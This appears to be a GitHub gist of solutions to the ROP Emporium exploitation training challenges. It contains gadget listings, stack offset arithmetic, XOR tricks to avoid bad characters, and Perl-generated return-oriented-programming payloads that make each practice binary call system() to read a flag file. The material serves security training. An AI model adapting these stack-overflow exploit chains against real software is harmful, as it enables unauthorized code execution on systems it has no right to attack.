import struct
def dumpx(x): return (''.join(map(lambda x: '\\x%02x'%x, struct.pack('<Q', x))))
def d(x): print ('print "%s";' % dumpx(x))
Last active
January 4, 2018 20:59
-
-
Save stek29/3965fc8172c80a7e3dff4426e21d1c08 to your computer and use it in GitHub Desktop.
ropemporium
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gadget-1: | |
0000000000400b34 movq %r12, (%r13) | |
0000000000400b38 ret | |
gadget 0: | |
0000000000400b3b popq %r12 | |
0000000000400b3d popq %r13 | |
0000000000400b3f ret | |
gadget 1: | |
0000000000400bb0 popq %r14 | |
0000000000400bb2 popq %r15 | |
0000000000400bb4 ret | |
gadget 2: | |
usefulGadgets: | |
0000000000400b30 xorb %r14b, (%r15) | |
0000000000400b33 ret | |
gadget 3: (mid-instruction) | |
0000000000400bb3 popq %rdi | |
0000000000400bb4 ret | |
gadget 4: | |
00000000004009e8 call j_system | |
data section starts at 0x601050 and size is 0x10 | |
❯ objdump -h write4 | grep \\.data | |
24 .data 00000010 0000000000601070 0000000000601070 00001050 2**3 | |
cat *xt\0 = \x63\x61\x74\x20\x2a\x78\x74\x00 | |
0x63 and 0x20 are badchars | |
so we'd xor at STR and STR+3 | |
however, if we place STR at 0x601070, then we'd need to xor at 0x601073 | |
but 0x601073 is prohibited | |
so we'd place STR at 0x601071 | |
perl -e ' | |
print "x"x40; | |
print "\x3b\x0b\x40\0\0\0\0\0\x64\x61\x74\x27\x2a\x78\x74\x00\x71\x10\x60\0\0\0\0\0"; | |
print "\x34\x0b\x40\0\0\0\0\0"; | |
print "\xb0\x0b\x40\0\0\0\0\0\x07\x00\x00\x00\x00\x00\x00\x00\x71\x10\x60\0\0\0\0\0"; | |
print "\x30\x0b\x40\0\0\0\0\0"; | |
print "\xb0\x0b\x40\0\0\0\0\0\x07\x00\x00\x00\x00\x00\x00\x00\x74\x10\x60\0\0\0\0\0"; | |
print "\x30\x0b\x40\0\0\0\0\0"; | |
print "\xb3\x0b\x40\0\0\0\0\0\x71\x10\x60\0\0\0\0\0"; | |
print "\xe8\x09\x40\0\0\0\0\0"; | |
print "\n"; | |
' | ./badchars | |
pwned :) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0x20 (32) local vars | |
0x08 ( 8) rbp | |
--- | |
0x08 ( 8) ret addr | |
0x100 (256) is read, so there is 0xd8 (216) bytes of overwrite | |
exactly what we need kek: | |
usefulGadgets: | |
0000000000401ab0 popq %rdi | |
0000000000401ab1 popq %rsi | |
0000000000401ab2 popq %rdx | |
0000000000401ab3 ret | |
0x28 (40) of garbage | |
0x20 0x401ab0, 0x1, 0x2, 0x3 | |
0x08 0x401850 | |
0x20 0x401ab0, 0x1, 0x2, 0x3 | |
0x08 0x401870 | |
0x20 0x401ab0, 0x1, 0x2, 0x3 | |
0x08 0x401810 | |
so, 0x28 * 3 of payload -- 0x78 (120) bytes | |
perl -e ' | |
print "x"x40; | |
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; | |
print "\x50\x18\x40\0\0\0\0\0"; | |
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; | |
print "\x70\x18\x40\0\0\0\0\0"; | |
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; | |
print "\x10\x18\x40\0\0\0\0\0"; | |
' | ./callme |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
j_system: // system | |
00000000004005e0 jmpq *system@GOT | |
---- | |
00000000004008c3 popq %rdi | |
00000000004008c4 ret | |
---- | |
questionableGadgets: | |
0000000000400820 popq %r15 | |
0000000000400822 xorq %r11, %r11 | |
0000000000400825 popq %r14 | |
0000000000400827 movl __data_start, %edi | |
000000000040082c ret | |
000000000040082d popq %r14 | |
000000000040082f xorq %r12, %r11 | |
0000000000400832 popq %r12 | |
0000000000400834 movl $0x604060, %r13d | |
000000000040083a ret | |
000000000040083b movl __data_start, %edi | |
0000000000400840 xchgq %r10, %r11 | |
0000000000400843 popq %r15 | |
0000000000400845 movl system@@GLIBC_2.2.5, %r11d | |
000000000040084b ret | |
000000000040084c popq %r15 | |
000000000040084e movq %r11, (%r10) | |
0000000000400851 popq %r13 | |
0000000000400853 popq %r12 | |
0000000000400855 xorb %r12b, (%r10) | |
0000000000400858 ret | |
--- | |
0000000000400845 * movl $0x602050, %r11d | |
000000000040084b x ret | |
--- | |
0000000000400832 x * popq %r12 | |
0000000000400834 movl $0x604060, %r13d | |
000000000040083a x ret | |
--- | |
000000000040082f * xorq %r12, %r11 | |
0000000000400832 x * popq %r12 | |
0000000000400834 movl $0x604060, %r13d | |
000000000040083a x ret | |
--- | |
0000000000400840 * xchgq %r10, %r11 | |
0000000000400843 x popq %r15 | |
0000000000400845 * movl $0x602050, %r11d | |
000000000040084b x ret | |
--- | |
000000000040082f * xorq %r12, %r11 | |
0000000000400832 x * popq %r12 | |
0000000000400834 movl $0x604060, %r13d | |
000000000040083a x ret | |
--- | |
000000000040084e * movq %r11, (%r10) | |
0000000000400851 x popq %r13 | |
0000000000400853 x * popq %r12 | |
0000000000400855 * xorb %r12b, (%r10) | |
0000000000400858 x ret | |
--- | |
00000000004008c3 x * popq %rdi | |
00000000004008c4 x ret | |
--- | |
00000000004005e0 jmpq *system@GOT | |
--- | |
24 .data 00000010 0000000000601050 0000000000601050 00001050 2**3 | |
CONTENTS, ALLOC, LOAD, DATA | |
cat *xt\0 = \x63\x61\x74\x20\x2a\x78\x74\x00 | |
0x74782a20746163 ^ 0x602050 = 0x74782a20144133 | |
\x33\x41\x14\x20\x2a\x78\x74\x00 | |
0x601050 | |
0x601050 ^ 0x602050 = 0x3000 | |
\x00\x00\x00\x00\x00\x00\x30\x00 | |
perl -e ' | |
print "x"x40; # filling | |
print "\x45\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400845 | |
print "\x32\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400832 | |
print "\x00\x30\x00\x00\x00\x00\x00\x00"; # 0x601050 ^ 0x602050, to pop into r12 | |
print "\x2f\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040082f | |
print "\x33\x41\x14\x20\x2a\x78\x74\x00"; # 0x74782a20746163 ^ 0x602050, to pop into r12 | |
print "\x40\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400840 | |
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r15 | |
print "\x2f\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040082f | |
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r12 | |
print "\x4e\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040084e | |
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r13 | |
print "\x00\x00\x00\x00\x00\x00\x00\x00"; # zeros for r12, to xor with *(%r10) | |
print "\xc3\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x00000000004008c3 | |
print "\x50\x10\x60\x00\x00\x00\x00\x00"; # 0x601050, to pop into rdi | |
print "\xe0\x05\x40\x00\x00\x00\x00\x00"; # ret to 0x00000000004005e0 | |
' | ./fluff |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0x20 (32) local vars | |
0x08 ( 8) rbp | |
--- | |
0x08 ( 8) ret addr | |
0x60 (96) is read, so there is 0x38 (56) bytes of overwrite | |
'popq %r15' is | |
datgadget: | |
0000000000400883 popq %rdi | |
0000000000400884 ret | |
at 0x601060: "/bin/cat flag.txt" | |
perl -e ' | |
print "x"x40; # filler | |
print "\x83\x08\x40\0\0\0\0\0"; # ret to datgadget | |
print "\x60\x10\x60\0\0\0\0\0"; # addr of string to pop into rdi | |
print "\x10\x08\x40\0\0\0\0\0"; # ret to call system | |
' | ./split |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gadget 1: | |
0000000000400890 popq %r14 | |
0000000000400892 popq %r15 | |
0000000000400894 ret | |
gadget 2: | |
usefulGadgets: | |
0000000000400820 movq %r15, (%r14) | |
0000000000400823 ret | |
gadget 3: (mid-instruction) | |
0000000000400893 popq %rdi | |
0000000000400894 ret | |
gadget 4: | |
0000000000400810 call j_system | |
data section starts at 0x601050 and size is 0x10 | |
❯ objdump -h write4 | grep \\.data | |
24 .data 00000010 0000000000601050 0000000000601050 00001050 2**3 | |
cat flag = \x63\x61\x74\x20\x66\x6c\x61\x67 | |
.txt\0 = \x2e\x74\x78\x74\x00\x00\x00\x00 | |
perl -e ' | |
print "x"x40; | |
print "\x90\x08\x40\0\0\0\0\0\x50\x10\x60\0\0\0\0\0\x63\x61\x74\x20\x66\x6c\x61\x67"; | |
print "\x20\x08\x40\0\0\0\0\0"; | |
print "\x90\x08\x40\0\0\0\0\0\x58\x10\x60\0\0\0\0\0\x2e\x74\x78\x74\x00\x00\x00\x00"; | |
print "\x20\x08\x40\0\0\0\0\0"; | |
print "\x93\x08\x40\0\0\0\0\0\x50\x10\x60\0\0\0\0\0"; | |
print "\x10\x08\x40\0\0\0\0\0"; | |
' | ./write4 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment